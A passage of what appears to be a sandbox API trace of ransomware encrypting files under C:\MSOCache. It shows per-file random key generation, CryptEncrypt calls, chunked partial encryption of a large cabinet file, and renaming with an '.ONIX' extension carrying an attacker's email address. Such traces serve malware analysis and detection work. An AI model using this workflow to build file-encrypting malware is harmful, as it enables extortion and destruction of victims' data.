users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x494 [0113.957] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0113.957] LockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xa4c400, nNumberOfBytesToLockHigh=0x0) returned 1 [0113.957] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0113.957] ReadFile (in: hFile=0x494, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0113.960] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.960] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0113.960] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0113.960] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0113.960] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi", dwFileAttributes=0x80) returned 1 [0113.960] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 77 [0113.961] GetProcessHeap () returned 0x410000 [0113.961] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10a) returned 0x467908 [0113.961] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" [0113.961] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0113.961] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=10798080) returned 1 [0113.961] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xa4c400 [0113.961] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0113.961] GetProcessHeap () returned 0x410000 [0113.961] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0113.961] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0113.961] WriteFile (in: hFile=0x494, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0113.962] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0113.963] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0113.964] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa4c400) returned 0x3680020 [0113.965] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa4c400) returned 0x40d0020 [0113.965] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.965] ReadFile (in: hFile=0x494, lpBuffer=0x3680020, nNumberOfBytesToRead=0xa4c400, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0xa4c400, lpOverlapped=0x0) returned 1 [0114.689] UnlockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xa4c400, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0114.689] CloseHandle (hObject=0x494) returned 1 [0114.691] GetProcessHeap () returned 0x410000 [0114.691] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0114.691] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0114.693] GetProcessHeap () returned 0x410000 [0114.693] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0114.693] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0114.693] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0114.693] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0114.693] FindNextFileW (in: hFindFile=0x48ecb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cabec50, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7cabec50, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1915, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrjProrWW.xml", cAlternateFileName="PRJPRO~1.XML")) returned 1 [0114.693] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0114.693] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0114.693] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458a78 [0114.693] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0114.693] GetLastError () returned 0x0 [0114.693] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x494 [0114.694] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0114.694] LockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1915, nNumberOfBytesToLockHigh=0x0) returned 1 [0114.694] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.694] ReadFile (in: hFile=0x494, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0114.698] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.698] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0114.698] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0114.698] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0114.698] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", dwFileAttributes=0x80) returned 1 [0114.698] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 77 [0114.698] GetProcessHeap () returned 0x410000 [0114.698] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10a) returned 0x467908 [0114.698] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" [0114.698] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0114.698] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=6421) returned 1 [0114.698] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1915 [0114.698] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0114.698] GetProcessHeap () returned 0x410000 [0114.698] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0114.698] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0114.699] WriteFile (in: hFile=0x494, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0114.700] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0114.702] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0114.703] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1915) returned 0x4d8b68 [0114.703] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1915) returned 0x4da488 [0114.703] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.703] ReadFile (in: hFile=0x494, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x1915, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x1915, lpOverlapped=0x0) returned 1 [0114.703] SetFilePointer (in: hFile=0x494, lDistanceToMove=-6421, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.703] WriteFile (in: hFile=0x494, lpBuffer=0x4da488*, nNumberOfBytesToWrite=0x1915, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4da488*, lpNumberOfBytesWritten=0x367f44c*=0x1915, lpOverlapped=0x0) returned 1 [0114.705] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0114.705] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4da488 | out: hHeap=0x410000) returned 1 [0114.705] UnlockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1915, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0114.705] CloseHandle (hObject=0x494) returned 1 [0114.706] GetProcessHeap () returned 0x410000 [0114.706] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0114.706] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0114.708] GetProcessHeap () returned 0x410000 [0114.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0114.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0114.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0114.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0114.708] FindNextFileW (in: hFindFile=0x48ecb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c87b0c0, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x6c87b0c0, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa6b67930, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x9b6ba9f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrjPrrWW.cab", cAlternateFileName="")) returned 1 [0114.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0114.708] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0114.708] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458a78 [0114.708] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0114.708] GetLastError () returned 0x0 [0114.708] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x494 [0114.708] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0114.709] LockFile (hFile=0x494, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x9b6ba9f, nNumberOfBytesToLockHigh=0x0) returned 1 [0114.709] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.709] ReadFile (in: hFile=0x494, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0114.714] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.714] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0114.714] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0114.714] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0114.715] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab", dwFileAttributes=0x80) returned 1 [0114.715] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 76 [0114.715] GetProcessHeap () returned 0x410000 [0114.715] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x467908 [0114.715] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" [0114.715] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0114.715] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=162970271) returned 1 [0114.715] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x9b6ba9f [0114.715] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0114.715] GetProcessHeap () returned 0x410000 [0114.715] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0114.715] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0114.715] WriteFile (in: hFile=0x494, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0114.718] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0114.719] WriteFile (in: hFile=0x494, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0114.719] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100000) returned 0x2b30020 [0114.720] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100000) returned 0x3680020 [0114.720] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x1300000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.720] ReadFile (in: hFile=0x494, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0114.763] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x9b6bba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.763] WriteFile (in: hFile=0x494, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0114.763] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x2600000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.763] ReadFile (in: hFile=0x494, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0114.774] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2600000 [0114.774] WriteFile (in: hFile=0x494, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0114.781] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x9b6bba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.781] WriteFile (in: hFile=0x494, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0114.782] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x3900000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.782] ReadFile (in: hFile=0x494, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0114.793] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3900000 [0114.793] WriteFile (in: hFile=0x494, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0114.800] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x9b6bba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.800] WriteFile (in: hFile=0x494, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0114.805] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x4c00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.805] ReadFile (in: hFile=0x494, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0114.869] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4c00000 [0114.869] WriteFile (in: hFile=0x494, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0114.875] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x9b6bba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.875] WriteFile (in: hFile=0x494, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0114.876] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x5f00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.876] ReadFile (in: hFile=0x494, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0114.887] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5f00000 [0114.887] WriteFile (in: hFile=0x494, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0114.893] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x9b6bba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.893] 